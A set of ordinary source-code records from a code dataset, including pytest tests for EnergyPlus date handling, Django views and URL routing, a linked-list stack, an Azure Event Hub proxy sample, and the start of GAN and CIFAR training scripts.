current_step_data, increment):\n assert (\n check_year_increment(\n first_step_data,\n current_step_data,\n )\n is increment\n )\n\n\n@pytest.mark.parametrize(\n \"first_step_data,current_step_data\",\n [\n (EsoTimestamp(1, 1, 0, 0), EsoTimestamp(2, 1, 0, 0)),\n (EsoTimestamp(1, 1, 1, 0), EsoTimestamp(1, 1, 2, 0)),\n ],\n ids=[\"monthly\", \"daily\"],\n)\ndef test_do_not_increment_year_monthly(first_step_data, current_step_data):\n assert not check_year_increment(first_step_data, current_step_data)\n\n\n@pytest.mark.parametrize(\n \"year,interval_tuples,expected\",\n [\n (\n 2002,\n [EsoTimestamp(1, 1, 0, 0), EsoTimestamp(2, 1, 0, 0), EsoTimestamp(3, 1, 0, 0)],\n [\n datetime(2002, 1, 1, 0, 0, 0),\n datetime(2002, 2, 1, 0, 0, 0),\n datetime(2002, 3, 1, 0, 0, 0),\n ],\n ),\n (\n 2002,\n [\n EsoTimestamp(12, 31, 23, 60),\n EsoTimestamp(12, 31, 24, 60),\n EsoTimestamp(1, 1, 1, 60),\n ],\n [\n datetime(2002, 12, 31, 23, 0, 0),\n datetime(2003, 1, 1, 0, 0, 0),\n datetime(2003, 1, 1, 1, 0, 0),\n ],\n ),\n ],\n)\ndef test_generate_timestamp_dates(year, interval_tuples, expected):\n assert generate_datetime_dates(interval_tuples, year) == expected\n\n\ndef test_convert_to_dt_index():\n env_dct = {\n \"hourly\": [\n EsoTimestamp(12, 31, 23, 60),\n EsoTimestamp(12, 31, 24, 60),\n EsoTimestamp(1, 1, 1, 60),\n ],\n \"monthly\": [\n EsoTimestamp(1, 1, 0, 0),\n EsoTimestamp(2, 1, 0, 0),\n EsoTimestamp(3, 1, 0, 0),\n ],\n }\n dates = convert_raw_dates(env_dct, 2002)\n assert dates == {\n \"hourly\": [\n datetime(2002, 12, 31, 23, 00, 00),\n datetime(2003, 1, 1, 00, 00, 00),\n datetime(2003, 1, 1, 1, 00, 00),\n ],\n \"monthly\": [\n datetime(2002, 1, 1, 0, 0, 0),\n datetime(2002, 2, 1, 0, 0, 0),\n datetime(2002, 3, 1, 0, 0, 0),\n ],\n }\n\n\ndef test_update_start_dates():\n env_dct = {\n \"hourly\": [datetime(2002, 5, 26, 0, 0), datetime(2002, 5, 26, 1, 0)],\n \"monthly\": [datetime(2002, 5, 1, 0, 0)],\n \"annual\": [datetime(2002, 1, 1, 0, 0)],\n \"runperiod\": [datetime(2002, 1, 1, 0, 0)],\n }\n update_start_dates(env_dct)\n assert env_dct == {\n \"hourly\": [datetime(2002, 5, 26, 0, 0), datetime(2002, 5, 26, 1, 0)],\n \"monthly\": [datetime(2002, 5, 26, 0, 0)],\n \"annual\": [datetime(2002, 5, 26, 0, 0)],\n \"runperiod\": [datetime(2002, 5, 26, 0, 0)],\n }\n\n\n@pytest.mark.parametrize(\n \"year, is_leap, date, day\",\n [\n (2020, True, EsoTimestamp(10, 28, 0, 0), \"Wednesday\"),\n (2020, True, EsoTimestamp(2, 29, 0, 0), \"Saturday\"),\n (2020, True, EsoTimestamp(1, 1, 0, 0), \"Wednesday\"),\n (2002, False, EsoTimestamp(10, 28, 0, 0), \"Monday\"),\n (2002, False, EsoTimestamp(2, 28, 0, 0), \"Thursday\"),\n (2002, False, EsoTimestamp(1, 1, 0, 0), \"Tuesday\"),\n ],\n)\ndef test_validate_year(year, is_leap, date, day):\n assert validate_year(year, is_leap, date, day) is None\n\n\n@pytest.mark.parametrize(\n \"year, is_leap, date, day, error\",\n [\n (2019, True, EsoTimestamp(10, 28, 0, 0), \"Wednesday\", LeapYearMismatch),\n (2001, True, None, None, LeapYearMismatch),\n (2002, False, EsoTimestamp(10, 28, 0, 0), \"Tuesday\", StartDayMismatch),\n (2020, True, EsoTimestamp(1, 1, 0, 0), \"Friday\", StartDayMismatch),\n ],\n)\ndef test_validate_year_incorrect(year, is_leap, date, day, error):\n with pytest.raises(error):\n validate_year(year, is_leap, date, day)\n\n\n@pytest.mark.parametrize(\n \"dates, expected\",\n [\n (\n [\n EsoTimestamp(2, 28, 0, 0),\n EsoTimestamp(2, 29, 0, 0),\n EsoTimestamp(3, 1, 0, 0),\n EsoTimestamp(3, 2, 0, 0),\n ],\n True,\n ),\n (\n [\n EsoTimestamp(2, 27, 0, 0),\n 
EsoTimestamp(2, 28, 0, 0),\n EsoTimestamp(3, 1, 0, 0),\n EsoTimestamp(3, 2, 0, 0),\n ],\n False,\n ),\n (\n [\n EsoTimestamp(2, 27, 0, 0),\n EsoTimestamp(2, 28, 0, 0),\n EsoTimestamp(3, 1, 0, 0),\n EsoTimestamp(3, 2, 0, 0),\n EsoTimestamp(3, 2, 0, 0),\n EsoTimestamp(2, 27, 0, 0),\n ],\n False,\n ),\n ],\n)\ndef test_is_leap_year_ts_to_d(dates, expected):\n assert is_leap_year_ts_to_d(dates) is expected\n\n\n@pytest.mark.parametrize(\n \"is_leap, date, day, max_year, expected\",\n [\n (True, EsoTimestamp(2, 1, 0, 0), \"Sunday\", 2020, 2004),\n (True, EsoTimestamp(2, 2, 0, 0), \"Monday\", 2020, 2004),\n (True, EsoTimestamp(2, 3, 0, 0), \"Tuesday\", 2020, 2004),\n (True, EsoTimestamp(2, 4, 0, 0), \"Wednesday\", 2020, 2004),\n (True, EsoTimestamp(2, 5, 0, 0), \"Thursday\", 2020, 2004),\n (True, EsoTimestamp(2, 6, 0, 0), \"Friday\", 2020, 2004),\n (True, EsoTimestamp(2, 7, 0, 0), \"Saturday\", 2020, 2004),\n (False, EsoTimestamp(2, 1, 0, 0), \"Sunday\", 2020, 2015),\n (False, EsoTimestamp(2, 2, 0, 0), \"Monday\", 2020, 2015),\n (False, EsoTimestamp(2, 3, 0, 0), \"Tuesday\", 2020, 2015),\n (False, EsoTimestamp(2, 4, 0, 0), \"Wednesday\", 2020, 2015),\n (False, EsoTimestamp(2, 5, 0, 0), \"Thursday\", 2020, 2015),\n (False, EsoTimestamp(2, 6, 0, 0), \"Friday\", 2020, 2015),\n (False, EsoTimestamp(2, 7, 0, 0), \"Saturday\", 2020, 2015),\n ],\n)\ndef test_seek_year(is_leap, date, day, max_year, expected):\n assert seek_year(is_leap, date, day, max_year) == expected\n\n\ndef test_seek_year_cannot_find():\n with pytest.raises(ValueError):\n print(seek_year(True, EsoTimestamp(2, 1, 0, 0), \"Monday\", 10))\n\n\n@pytest.mark.parametrize(\n \"is_leap, date, day, max_year, expected\",\n [\n (True, EsoTimestamp(1, 1, 0, 0), \"Sunday\", 2030, [2012, 1984, 1956]),\n (True, EsoTimestamp(1, 1, 0, 0), \"Monday\", 2030, [2024, 1996, 1968]),\n (True, EsoTimestamp(1, 1, 0, 0), \"Tuesday\", 2030, [2008, 1980, 1952]),\n (True, EsoTimestamp(1, 1, 0, 0), \"Wednesday\", 2030, [2020, 1992, 1964]),\n (True, EsoTimestamp(1, 1, 0, 0), \"Friday\", 2030, [2016, 1988, 1960]),\n (True, EsoTimestamp(1, 1, 0, 0), \"Saturday\", 2030, [2028, 2000, 1972]),\n (False, EsoTimestamp(1, 1, 0, 0), \"Sunday\", 2030, [2023, 2017, 2006]),\n (False, EsoTimestamp(1, 1, 0, 0), \"Monday\", 2030, [2029, 2018, 2007]),\n (False, EsoTimestamp(1, 1, 0, 0), \"Tuesday\", 2030, [2030, 2019, 2013]),\n (False, EsoTimestamp(1, 1, 0, 0), \"Wednesday\", 2030, [2025, 2014, 2003]),\n (False, EsoTimestamp(1, 1, 0, 0), \"Friday\", 2030, [2027, 2021, 2010]),\n (False, EsoTimestamp(1, 1, 0, 0), \"Saturday\", 2030, [2022, 2011, 2005]),\n ],\n)\ndef test_get_allowed_years(is_leap, date, day, max_year, expected):\n assert get_allowed_years(is_leap, date, day, max_year, n_samples=3) == expected\n\n\n@pytest.mark.parametrize(\n \"dates, days, valid_date_day\",\n [\n (\n [EsoTimestamp(1, 1, 0, 0), EsoTimestamp(1, 2, 0, 0)],\n [\"Sunday\", \"Monday\"],\n (EsoTimestamp(1, 1, 0, 0), \"Sunday\"),\n ),\n (\n [EsoTimestamp(1, 1, 0, 0), EsoTimestamp(1, 2, 0, 0)],\n [\"Holiday\", \"Monday\"],\n (EsoTimestamp(1, 2, 0, 0), \"Monday\"),\n ),\n ([EsoTimestamp(1, 1, 0, 0), EsoTimestamp(1, 2, 0, 0)], [\"Holiday\", \"Holiday\"], None),\n (\n [EsoTimestamp(1, 1, 0, 0), EsoTimestamp(1, 2, 0, 0)],\n [\"WinterDesignDay\", \"WinterDesignDay\"],\n None,\n ),\n ],\n)\ndef test_valid_date_day(dates, days, valid_date_day):\n assert find_first_valid_day(dates, days) == valid_date_day\n\n\n@pytest.mark.parametrize(\n \"drop_intervals, year, expected_start_end\",\n [\n (\n [],\n None,\n {\n TS: 
(datetime(2020, 1, 1, 0, 30), datetime(2021, 1, 1, 0)),\n H: (datetime(2020, 1, 1, 1, 0), datetime(2021, 1, 1, 0)),\n D: (datetime(2020, 1, 1), datetime(2020, 12, 31, 0)),\n M: (datetime(2020, 1, 1), datetime(2020, 12, 1, 0)),\n A: (datetime(2020, 1, 1), datetime(2020, 1, 1)),\n RP: (datetime(2020, 1, 1), datetime(2020, 1, 1)),\n },\n ),\n (\n [TS, H, D],\n None,\n {\n M: (datetime(2002, 1, 1), datetime(2002, 12, 1, 0)),\n A: (datetime(2002, 1, 1), datetime(2002, 1, 1)),\n RP: (datetime(2002, 1, 1), datetime(2002, 1, 1)),\n },\n ),\n (\n [],\n 2020,\n {\n TS: (datetime(2020, 1, 1, 0, 30), datetime(2021, 1, 1, 0)),\n H: (datetime(2020, 1, 1, 1, 0), datetime(2021, 1, 1, 0)),\n D: (datetime(2020, 1, 1), datetime(2020, 12, 31, 0)),\n M: (datetime(2020, 1, 1), datetime(2020, 12, 1, 0)),\n A: (datetime(2020, 1, 1), datetime(2020, 1, 1)),\n RP: (datetime(2020, 1, 1), datetime(2020, 1, 1)),\n },\n ),\n (\n [TS, H, D],\n 2010,\n {\n M: (datetime(2010, 1, 1), datetime(2010, 12, 1, 0)),\n A: (datetime(2010, 1, 1), datetime(2010, 1, 1)),\n RP: (datetime(2010, 1, 1), datetime(2010, 1, 1)),\n },\n ),\n ],\n)\ndef test_convert_raw_date_data(drop_intervals, year, expected_start_end, test_logger):\n with open(Path(EPLUS_TEST_FILES_PATH, \"leap_year.eso\"), \"r\") as file:\n with test_logger.log_task(\"Test leap year\"):\n all_raw_outputs = read_file(file, test_logger)\n raw_outputs = all_raw_outputs[-1]\n for interval in drop_intervals:\n raw_outputs.remove_interval_data(interval)\n\n dates = convert_raw_date_data(raw_outputs.dates, raw_outputs.days_of_week, year)\n for interval, date_arr in dates.items():\n assert date_arr[0] == expected_start_end[interval][0]\n assert date_arr[-1] == expected_start_end[interval][1]\n","sub_path":"tests/processing/test_time_processing.py","file_name":"test_time_processing.py","file_ext":"py","file_size_in_byte":13387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"344927810","text":"import numpy as np\r\n'''\r\nA code for homogeneous transformation of RRP Stanford type manipulator.\r\n'''\r\ndef calculate_transformation(q1,q2,p3,l1=1,l2=1):\r\n # joint 2 and joint 3\r\n H23 = np.array([[1,0,0,l2],\r\n [0,1,0,0 ],\r\n [0,0,1,0],\r\n [0,0,0,1]])\r\n # joint 1 and joint 2\r\n H12 = np.array([[np.cos(q2),-np.sin(q2),0,0], \r\n [0,0,-1,0],\r\n [np.sin(q2),np.cos(q2),0,l1 ],\r\n [0,0,0,1]])\r\n \r\n # Ground frame and joint 1\r\n H01 = np.array([[np.cos(q1),-np.sin(q1),0,0],\r\n [np.sin(q1),np.cos(q1),0,0 ],\r\n [0,0,1,0],\r\n [0,0,0,1]])\r\n \r\n # [p0 = H01*H12*H13*[p3\r\n # 1] 1]\r\n temp = np.matmul(np.matmul(np.matmul(H01,H12),H23),p3)\r\n p0 = temp[:-1]\r\n return p0\r\n\r\n\r\n'''\r\nparams -> q1 - joint angle 1 in radians\r\n q2 - joint angle 2 in radians\r\n p3 - basically [p3,1].T\r\n l1 - length of link 1 \r\n l2 - length of link 2\r\n'''\r\nq1 = 0.1\r\nq2 = 0.2 \r\ndpx = 0.5\r\np3 = [dpx,0,0,1]\r\np0 = calculate_transformation(q1,q2,np.transpose(p3))\r\nprint(p0)\r\n\r\n","sub_path":"Assignment 2/Q8.py","file_name":"Q8.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45632031","text":"\"\"\"yunwei URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. 
Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom osapp.views import *\nfrom django.conf.urls import patterns\n\nurlpatterns = [\n url(r'^$',index,name='index'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^MyBlog/$', archive),\n url(r'^test/$', test, name='test'),\n url(r'^your-name/$', get_name),\n url(r'^user/$', get_user),\n url(r'^add/$',add , name='add'),\n url(r'^env_add/$',env_add , name='env_add'),\n url(r'^env_list/$',env_list , name='env_list'),\n url(r'^env_html/$',env_html , name='env_html'),\n url(r'^env_del/$',env_del , name='env_del'),\n url(r'^env_edit/$',env_edit,name='env_edit'),\n url(r'^tom_add/$',tom_add,name='tom_add'),\n url(r'^tom_edit/$',tom_edit,name='tom_edit'),\n url(r'^tom_del/$',tom_del,name='tom_del'),\n url(r'^tom_list/$',tom_list,name='tom_list'),\n url(r'^tom_save/$',tom_save,name='tom_save'),\n url(r'^con_list/$',con_list,name='con_list'),\n url(r'^con_del/$',con_del,name='con_del'),\n url(r'^upload_file/$',upload_file,name='upload_file'),\n url(r'^upload_ajax/$',upload_ajax,name='upload_ajax'),\n url(r'^dep_env/$',dep_env,name='dep_env'),\n url(r'^dep_app/$',dep_app,name='dep_app'),\n url(r'^dep_app_to_server/$',dep_app_to_server,name='dep_app_to_server'),\n url(r'^del_con_server/$',del_con_server,name='del_con_server'),\n url(r'^edit_con_srv/$',edit_con_srv,name='edit_con_srv'),\n url(r'^app_save/$',app_save,name=\"app_save\"),\n url(r'^get_dep_srv/$',get_dep_srv,name=\"get_dep_srv\")\n]\n","sub_path":"static/YWZJ/Python/yunwei/yunwei/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"445211940","text":"#CPE 202 - Project 1\n#Name: Ajay Patel\n#Section: 1\n#Instructor: S. 
Einakian\n\n\nclass Node:\n    def __init__(self, newval):\n        self.value = newval\n        self.next = None\n\nclass Stack:\n    def __init__(self, capacity):\n        self.capacity = capacity\n        self.head = None\n        self.num_items = 0\n\n\n    #To check whether or not the stack is empty \n    #None --> True if stack is empty and False if stack is not empty\n    def is_empty(self):\n        if self.num_items == 0:\n            return True\n        else:\n            return False\n\n    #To check whether or not the stack is full\n    #None --> True if stack is full and False if stack is not full \n    def is_full(self):\n        if self.num_items == self.capacity:\n            return True\n        else:\n            return False \n    \n    #To take an item and add it to the stack \n    #item --> None\n    def push(self, item):\n        if self.num_items == self.capacity:\n            raise IndexError('Stack is full')\n        else:\n            temp = Node(item)\n            temp.next = self.head\n            self.head = temp\n            self.num_items += 1 \n\n\n    #To remove an item from the stack if the stack is not empty \n    #None --> item \n    def pop(self): \n        if self.num_items == 0:\n            raise IndexError('Stack is empty')\n        else:\n            temp = self.head.value \n            self.head = self.head.next\n            self.num_items -= 1\n\n            return temp\n\n    #To return the last item in the stack without removing it \n    #None --> item \n    def peek(self):\n        if self.num_items == 0:\n            raise IndexError('Stack is empty')\n        else:\n            item = self.head\n\n            return item.value\n\n    #To get the total number of nodes in the stack\n    #None --> int\n    def size(self):\n        return self.num_items\n","sub_path":"Project5/Project1/stack_linked.py","file_name":"stack_linked.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45140022","text":"from django.http.response import HttpResponse\nfrom django.shortcuts import render\nfrom .models import Syllabus, SyllabusCategory, SyllabusSubCategory\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\nclass Tutorial:\n    currentSyllabus = None\n\n    def setCurrentSyllabus(syllabus):\n        currentSyllabus = Syllabus\n    def getSyllabusCategoryAndSubCategory(request):\n        syllabusCategories = SyllabusCategory.objects.all()\n        syllabusSubCategories = SyllabusSubCategory.objects.all().order_by('index')\n        # syllabus = Syllabus.objects.all()\n        return render(request,'syllabus.html',{'syllabusCategories':syllabusCategories, 'syllabusSubCategories':syllabusSubCategories})\n\n    @login_required(login_url='authentication:login')\n    def getContentBySubCategory(request,subCategorySlug = None):\n        print(request.user.user_profile)\n        if request.user.user_profile.is_subscribed:\n            subCategory = SyllabusSubCategory.objects.get(slug = subCategorySlug)\n            allContents = Syllabus.objects.filter(sub_category = subCategory)\n            print(allContents)\n            return render(request,'syllabusContent.html',{'subCategory':subCategory,'allContents':allContents})\n\n    @login_required(login_url='authentication:login')\n    def getContentByContentSlug(request,subCategorySlug=None, contentSlug=None):\n        if not request.user.user_profile.is_subscribed:\n            return render(request,'order_details.html',{'course_price':399})\n        subCategory = SyllabusSubCategory.objects.get(slug = subCategorySlug)\n        allContents = Syllabus.objects.filter(sub_category = subCategory)\n        print(allContents[0].syllabus_type_id) \n        selectedContent = None\n        if contentSlug == '__all__':\n            selectedContent = allContents[0]\n        else:\n            selectedContent = Syllabus.objects.get(slug = contentSlug)\n        print(allContents.values())\n        file_path = selectedContent.text_content_file\n        
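# --- Editor's note (not part of any record) -------------------------------
# A minimal usage sketch for the Stack class from the stack_linked.py record
# above (it assumes the num_items fix applied there); an illustration only,
# not code from the original project.

s = Stack(capacity=3)
s.push('a')
s.push('b')
assert s.peek() == 'b'   # peek reads the head value without removing it
assert s.pop() == 'b'    # pop returns items in LIFO order
assert s.size() == 1 and not s.is_empty()
# ---------------------------------------------------------------------------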
textFileContent = None\n if file_path is not None and file_path != '':\n \n print('file path is ',file_path)\n f = open(\"static/media/\"+str(file_path), 'r')\n textFileContent = f.read()\n f.close()\n return render(request,'syllabusContent.html',{'subCategory':subCategory,'allContents':allContents, 'selectedContent':selectedContent, 'textFileContent':textFileContent})\n \n","sub_path":"tutorial/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"182899881","text":"import os\ndef get_doc_id_list(path, fsave):\n with open(fsave, \"w+\", encoding=\"utf-8\") as f:\n for fname in os.listdir(path):\n f.write(\"{}\\n\".format(fname))\n\nif __name__ == \"__main__\":\n path = \"../data/evaluation/conll2003_ta/query/\"\n fsave = \"../data/evaluation/conll2003_ta/doc_id_list.tsv\"\n get_doc_id_list(path, fsave)","sub_path":"misc/get_doc_id_list.py","file_name":"get_doc_id_list.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"446983772","text":"# -*- coding: utf-8 -*-\nimport mock\nimport pytest\nfrom bravado_core.exception import SwaggerMappingError\n\nfrom bravado_core.marshal import marshal_primitive\n\n\ndef test_integer():\n integer_spec = {\n 'type': 'integer'\n }\n assert 10 == marshal_primitive(integer_spec, 10)\n\n\ndef test_string():\n string_spec = {\n 'type': 'string'\n }\n assert 'foo' == marshal_primitive(string_spec, 'foo')\n assert u'Ümlaut' == marshal_primitive(string_spec, u'Ümlaut')\n\n\n@mock.patch('bravado_core.marshal.formatter.to_wire')\ndef test_uses_default_and_skips_formatting(mock_to_wire):\n integer_spec = {\n 'type': 'integer',\n 'default': 10,\n }\n assert 10 == marshal_primitive(integer_spec, None)\n assert mock_to_wire.call_count == 0\n\n\n@mock.patch('bravado_core.marshal.formatter.to_wire', return_value=99)\ndef test_skips_default(mock_to_wire):\n integer_spec = {\n 'type': 'integer',\n 'default': 10,\n }\n assert 99 == marshal_primitive(integer_spec, 99)\n assert mock_to_wire.call_count == 1\n\n\ndef test_required():\n integer_spec = {\n 'type': 'integer',\n 'required': True,\n }\n assert 99 == marshal_primitive(integer_spec, 99)\n\n\ndef test_required_failure():\n integer_spec = {\n 'type': 'integer',\n 'required': True,\n }\n with pytest.raises(SwaggerMappingError) as excinfo:\n marshal_primitive(integer_spec, None)\n assert 'is a required value' in str(excinfo.value)\n","sub_path":"tests/marshal/marshal_primitive_test.py","file_name":"marshal_primitive_test.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653438127","text":"import yaml\nimport sys\nimport os\n\nimport log\n\nCONFIG_FILE_NAME = \"config.yml\"\n\nclass Config(object):\n def __init__(self, conf_yml_file):\n if (not os.path.exists(conf_yml_file)):\n log.logging.critical('Config file not found!')\n sys.exit(-1)\n with open(conf_yml_file,'r') as stream:\n try:\n data = yaml.load(stream)\n except yaml.YAMLError:\n log.logging.critical('Error in config file!')\n sys.exit(-1)\n\n self.__mysql = data['mysql']\n\n\n def get(self, arg):\n\n if (arg == \"mysql\"):\n return self.__mysql\n\n else:\n log.logging.error('Unknown config request!')\n\ncfg = 
Config(CONFIG_FILE_NAME)\n","sub_path":"Sensor/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"230949420","text":"#!/usr/bin/env python\n\n# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\n\"\"\"\nAn example to show sending and receiving events behind a proxy\n\"\"\"\nimport os\nimport time\nfrom azure.eventhub import EventPosition, EventData, EventHubConsumerClient, EventHubProducerClient\n\nCONNECTION_STR = os.environ[\"EVENT_HUB_CONN_STR\"]\nEVENTHUB_NAME = os.environ['EVENT_HUB_NAME']\n\nEVENT_POSITION = EventPosition(\"-1\")\nPARTITION = \"0\"\nHTTP_PROXY = {\n 'proxy_hostname': '127.0.0.1', # proxy hostname\n 'proxy_port': 3128, # proxy port\n 'username': 'admin', # username used for proxy authentication if needed\n 'password': '123456' # password used for proxy authentication if needed\n}\n\n\ndef on_event(partition_context, event):\n print(\"received event from partition: {}\".format(partition_context.partition_id))\n # do some operations on the event\n print(event)\n\n\nconsumer_client = EventHubConsumerClient.from_connection_string(\n conn_str=CONNECTION_STR, eventhub_name=EVENTHUB_NAME, http_proxy=HTTP_PROXY)\nproducer_client = EventHubProducerClient.from_connection_string(\n conn_str=CONNECTION_STR, eventhub_name=EVENTHUB_NAME, http_proxy=HTTP_PROXY)\n\nwith producer_client:\n producer_client.send(EventData(\"A single event\"))\n print('Finish sending.')\n\nwith consumer_client:\n receiving_time = 5\n consumer_client.receive(on_event=on_event, consumer_group='$Default')\n print('Finish receiving.')\n\n","sub_path":"sdk/eventhub/azure-eventhubs/samples/sync_samples/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"147100564","text":"import torch\nfrom torchvision import datasets, transforms\nfrom torchvision.utils import save_image\nfrom model import WGAN_GP\n\nif __name__ == \"__main__\":\n\n root = 'data/'\n image_size = 32\n batch_size = 128\n nb_epochs = 10\n\n dataset = datasets.MNIST(root,\n transform=transforms.Compose([\n transforms.Resize(image_size),\n transforms.ToTensor(), \n transforms.Normalize((0.5,), (0.5,))\n ]),\n download=True)\n\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,\n shuffle=True, num_workers=0)\n\n WGANGP_model = WGAN_GP(n_c=1, batch_size=batch_size, model_depth=4)\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") \n z = torch.randn((64, 100, 1, 1), device=device)\n result = WGANGP_model(z)\n save_image(result, 'results/noise.png')\n\n for n_epoch in range(nb_epochs):\n WGANGP_model.train_epoch(dataloader)\n WGANGP_model.save_models()\n result = WGANGP_model(z)\n save_image(result, 'results/result_epoch{}.png'.format(n_epoch))\n","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"527132861","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 23/11/2013\n\n@author: ubuntu\n'''\n\n\nclass Persona(object):\n 
'''\n    classdocs\n    '''\n\n    # Constructor\n    def __init__(self, Nombre=None, Apellido=None, Pais=None, \\\n            Institucion=None):\n        # Type checks\n        SonNone = Nombre is not None and Apellido is not None and \\\n            Pais is not None and Institucion is not None\n\n        if (type(Nombre) == str) and (type(Apellido) == str) and \\\n            (type(Pais) == str) and (type(Institucion) == str) and SonNone:\n\n            # Strip spaces before and after each word\n            Nombre = Nombre.strip()\n            Apellido = Apellido.strip()\n            Pais = Pais.strip()\n            Institucion = Institucion.strip()\n\n            # check for empty strings\n            Longitud_vacia = (len(Nombre) == 0) or (len(Apellido) == 0) or \\\n                (len(Pais) == 0) or (len(Institucion) == 0)\n\n            if Longitud_vacia:\n                self.__Inicializar_None()\n            else:\n                self.__Nombre = Nombre\n                self.__Apellido = Apellido\n                self.__Pais = Pais\n                self.__Institucion = Institucion\n\n        else:\n            self.__Inicializar_None()\n\n    # Initializes every field to None\n    def __Inicializar_None(self):\n        self.__Nombre = None\n        self.__Apellido = None\n        self.__Pais = None\n        self.__Institucion = None\n\n    # Returns the person's first name\n    def get_nombre(self):\n        return self.__Nombre\n\n    # Returns the person's last name\n    def get_apellido(self):\n        return self.__Apellido\n\n    # Returns the person's country\n    def get_pais(self):\n        return self.__Pais\n\n    # Returns the person's institution\n    def get_institucion(self):\n        return self.__Institucion\n\n    # Changes the person's first name\n    def set_nombre(self, value):\n        if type(value) == str:\n            value = value.strip()\n            if len(value) != 0:\n                self.__Nombre = value\n                return True\n        return False\n\n    # Changes the person's last name\n    def set_apellido(self, value):\n        if type(value) == str:\n            value = value.strip()\n            if len(value) != 0:\n                self.__Apellido = value\n                return True\n        return False\n\n    # Changes the person's country\n    def set_pais(self, value):\n        if type(value) == str:\n            value = value.strip()\n            if len(value) != 0:\n                self.__Pais = value\n                return True\n        return False\n\n    # Changes the person's institution\n    def set_institucion(self, value):\n        if type(value) == str:\n            value = value.strip()\n            if len(value) != 0:\n                self.__Institucion = value\n                return True\n        return False\n\n\nif __name__ == '__main__':\n    pass\n","sub_path":"Persona.py","file_name":"Persona.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"309098974","text":"#!/usr/bin/python -tt\n# Another example of hexbin plot\n\nfrom matplotlib import pyplot as PLT\nfrom matplotlib import cm as CM\nfrom matplotlib import mlab as ML\nimport numpy as NP\n\ndef main():\n    x = y = NP.linspace(-5, 5, 100)\n    X, Y = NP.meshgrid(x, y)\n    Z1 = ML.bivariate_normal(X, Y, 2, 2, 0, 0)\n    Z2 = ML.bivariate_normal(X, Y, 4, 1, 1, 1)\n    ZD = Z2 - Z1\n    x = X.ravel()\n    y = Y.ravel()\n    z = ZD.ravel()\n    gridsize=30\n    PLT.subplot(111)\n\n    PLT.hexbin(x, y, C=z, gridsize=gridsize, cmap=CM.jet, bins=None)\n    PLT.axis([x.min(), x.max(), y.min(), y.max()])\n\n    cb = PLT.colorbar()\n    cb.set_label('mean value')\n    PLT.show() \n\nif __name__ == '__main__':\n    main()\n","sub_path":"matplotlib-demo/hexbin2.py","file_name":"hexbin2.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"534298083","text":"import argparse\n\nimport torch\nfrom torch import nn, optim\nimport torch.backends.cudnn as cudnn\nfrom torch.utils.tensorboard import SummaryWriter\nimport torch.nn.functional as 
F\nimport numpy as np\nimport random\nimport os\nimport shutil\nimport sys\nimport json\n\nfrom data.augmix_data_manager import get_val_loader, get_train_loader\nfrom data.CIFAR100Dataset import CIFAR100Dataset\nfrom models.resnext import resnext29\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description=\"training script\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--batch_size\", \"-b\", type=int, default=128, help=\"Batch size\")\n parser.add_argument('--pretrained', action='store_true', help='Load pretrain model')\n\n parser.add_argument(\"--learning_rate\", \"-l\", type=float, default=0.1, help=\"Learning rate\")\n parser.add_argument(\"--epochs\", \"-e\", type=int, default=200, help=\"Number of epochs\")\n parser.add_argument(\"--n_workers\", type=int, default=4, help=\"Number of workers for dataloader\")\n parser.add_argument(\"--data_parallel\", action='store_true', help='Run on all visible gpus')\n\n parser.add_argument(\"--shape_loss_weight\", type=float, default=0., help=\"Shape loss weight\")\n parser.add_argument(\"--color_loss_weight\", type=float, default=0., help=\"Color loss weight\")\n parser.add_argument(\"--distance_criterion\", type=str, default='MSE', help=\"MSE or cosine\")\n\n parser.add_argument(\"--img_dir\", default='/home/work/Datasets/CIFAR100/cifar-100', help=\"Images dir path\")\n\n parser.add_argument('--resume', default='', type=str,\n help='path to latest checkpoint (default: none)')\n 